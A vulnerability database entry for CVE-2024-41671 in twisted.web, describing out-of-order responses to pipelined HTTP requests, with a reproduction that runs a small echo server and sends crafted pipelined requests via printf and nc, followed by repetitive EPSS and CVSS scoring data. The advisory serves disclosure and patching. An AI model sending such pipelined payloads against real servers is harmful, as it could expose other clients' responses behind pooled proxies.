Search for vulnerabilities
Vulnerability details: VCID-j9j7-9v69-aaas
Vulnerability ID VCID-j9j7-9v69-aaas
Aliases CVE-2024-41671
GHSA-c8m8-j448-xjx7
Summary twisted.web has disordered HTTP pipeline response ### Summary The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure. ### PoC 0. Start a fresh Debian container: ```sh docker run --workdir /repro --rm -it debian:bookworm-slim ``` 1. Install twisted and its dependencies: ```sh apt -y update && apt -y install ncat git python3 python3-pip \ && git clone --recurse-submodules https://github.com/twisted/twisted \ && cd twisted \ && pip3 install --break-system-packages . ``` 2. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following: ```python from twisted.web import server, resource from twisted.internet import reactor class TheResource(resource.Resource): isLeaf = True def render_GET(self, request) -> bytes: return b"GET" def render_POST(self, request) -> bytes: return b"POST" site = server.Site(TheResource()) reactor.listenTCP(80, site) reactor.run() ``` 3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection: ```sh (printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80 ``` 4. Observe that the responses arrive out of order: ``` HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:41 GMT Content-Length: 5 Content-Type: text/html POST HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 4 Content-Type: text/html GET HTTP/1.1 200 OK Server: TwistedWeb/24.3.0.post0 Date: Tue, 09 Jul 2024 06:19:42 GMT Content-Length: 5 Content-Type: text/html POST ``` ### Impact See [GHSA-xc8x-vp79-p3wm](https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm). Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.
Status Published
Exploitability 0.5
Weighted Severity 8.0
Risk 4.0
Affected and Fixed Packages Package Details
Weaknesses (3)
System Score Found at
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00045 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00073 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00081 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00088 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00103 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00239 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00239 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00239 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00259 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00292 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
epss 0.00601 https://api.first.org/data/v1/epss?cve=CVE-2024-41671
cvssv3.1 8.6 https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
cvssv3.1_qr HIGH https://github.com/advisories/GHSA-c8m8-j448-xjx7
cvssv3.1_qr MODERATE https://github.com/advisories/GHSA-c8m8-j448-xjx7
cvssv3.1 6.1 https://github.com/twisted/twisted
cvssv3.1 8.3 https://github.com/twisted/twisted
generic_textual MODERATE https://github.com/twisted/twisted
cvssv3.1 6.1 https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
cvssv3.1 8.3 https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
generic_textual MODERATE https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
cvssv3.1 8.3 https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
generic_textual HIGH https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
generic_textual MODERATE https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
cvssv3.1 8.3 https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
cvssv3.1_qr MODERATE https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
generic_textual HIGH https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
generic_textual MODERATE https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
cvssv3.1 8.3 https://nvd.nist.gov/vuln/detail/CVE-2024-41671
generic_textual HIGH https://nvd.nist.gov/vuln/detail/CVE-2024-41671
generic_textual MODERATE https://nvd.nist.gov/vuln/detail/CVE-2024-41671
No exploits are available.
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L Found at https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/twisted/twisted
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L Found at https://github.com/twisted/twisted
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Found at https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L Found at https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L Found at https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L Found at https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L Found at https://nvd.nist.gov/vuln/detail/CVE-2024-41671
Attack Vector (AV) Attack Complexity (AC) Privileges Required (PR) User Interaction (UI) Scope (S) Confidentiality Impact (C) Integrity Impact (I) Availability Impact (A)

network

adjacent_network

local

physical

low

high

none

low

high

none

required

unchanged

changed

high

low

none

high

low

none

high

low

none

Exploit Prediction Scoring System (EPSS)
Percentile 0.16666
EPSS Score 0.00045
Published At Nov. 1, 2024, midnight
Date Actor Action Source VulnerableCode Version
2024-07-29T20:24:38.980122+00:00 GithubOSV Importer Import https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c8m8-j448-xjx7/GHSA-c8m8-j448-xjx7.json 34.0.0rc4